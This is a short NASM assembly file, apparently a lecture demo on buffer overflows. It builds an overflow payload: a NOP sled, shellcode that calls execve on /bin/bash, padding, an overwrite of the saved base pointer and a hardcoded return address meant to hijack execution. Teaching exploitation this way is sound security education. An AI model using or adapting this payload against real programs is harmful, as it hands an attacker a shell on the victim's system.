sfl-examples/lecture-demos/buffer-overflow/bufoverflow.shellcode.asm

24 lines
480 B
NASM

bits 64
global _start
_start:
times 128 nop
; 59 sys_execve const char *filename const char *const argv[] const char *const envp[]
; (rdi, rsi, rdx, r10, r8, r9)
mov rax, 59
lea rdi, [rel binbash]
xor rsi, rsi
xor rdx, rdx
syscall
times 5 nop
binbash:
db '/bin/bash', 0x00
ALIGN 512 ; 512-byte alignment for this part
times 8 nop ; overwrite saved rbp
dq 0x7fffffffdcd0 ; overwrite rip ([rbp+8])